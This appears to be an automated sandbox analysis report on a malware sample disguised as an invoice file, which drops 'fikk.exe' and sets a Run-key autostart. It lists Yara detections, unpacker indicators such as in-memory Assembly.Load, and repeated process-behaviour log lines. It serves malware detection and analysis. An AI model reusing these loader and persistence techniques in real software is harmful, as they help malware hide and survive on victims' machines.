                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed2! source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: 37d4c34f-a7fd-478e-84fe-ac246c9c46bb<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedFoytgem.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Foytgem.pdb source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279102E1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED929C000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: invoices---DEC_2023.exe, PrinterMapperWrapper.cs.Net Code: AddWorker System.Reflection.Assembly.Load(byte[])
                      Source: fikk.exe.0.dr, PrinterMapperWrapper.cs.Net Code: AddWorker System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 7.2.fikk.exe.1fed93365a8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.fikk.exe.2797bc70000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.invoices---DEC_2023.exe.1ee908565a8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.fikk.exe.279108565a8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c122930e38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c10ebade48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.fikk.exe.2a4c8178370.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c1228e0e00.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.fikk.exe.2a4c8178370.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c1228e0e00.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c122930e38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fikk.exe.1d9099fbbb0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c127810000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c122b10ea8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c1228b8dc8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fikk.exe.1d9099fbbb0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c1228b8dc8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.invoices---DEC_2023.exe.1c10ebade48.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.fikk.exe.279106b9938.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2048259063.000001C127810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2525528464.000002797BC70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2039823779.000001C12266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: invoices---DEC_2023.exe PID: 748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 1976, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 3812, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 0_2_00007FF848F180F1 push ecx; iretd 0_2_00007FF848F180F4
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F4184B push eax; iretd 2_2_00007FF848F41871
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F42650 push FFFFFFBEh; ret 2_2_00007FF848F42652
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F400BD pushad ; iretd 2_2_00007FF848F400C1
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F4533A push esi; retf 2_2_00007FF848F4533D
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F45366 push ds; retf 2_2_00007FF848F45375
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848F455C5 push edi; iretd 2_2_00007FF848F455D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 3_2_00007FF848F400BD pushad ; iretd 3_2_00007FF848F400C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 3_2_00007FF848F480F1 push ecx; iretd 3_2_00007FF848F480F4
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F32650 push FFFFFFBEh; ret 5_2_00007FF848F32652
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F355C5 push edi; iretd 5_2_00007FF848F355D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F3184B push eax; iretd 5_2_00007FF848F31871
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F300BD pushad ; iretd 5_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F3533A push esi; retf 5_2_00007FF848F3533D
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848F35366 push ds; retf 5_2_00007FF848F35375
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 6_2_00007FF848F300BD pushad ; iretd 6_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 6_2_00007FF848F380F1 push ecx; iretd 6_2_00007FF848F380F4
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3184B push eax; iretd 7_2_00007FF848F31871
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F32650 push FFFFFFBEh; ret 7_2_00007FF848F32652
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F300BD pushad ; iretd 7_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3533A push esi; retf 7_2_00007FF848F3533D
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F35366 push ds; retf 7_2_00007FF848F35375
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F355C5 push edi; iretd 7_2_00007FF848F355D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F468B5 push edx; ret 7_2_00007FF848F468BB
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeFile created: C:\Users\user\AppData\Roaming\fikk.exeJump to dropped file
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fikkJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fikkJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
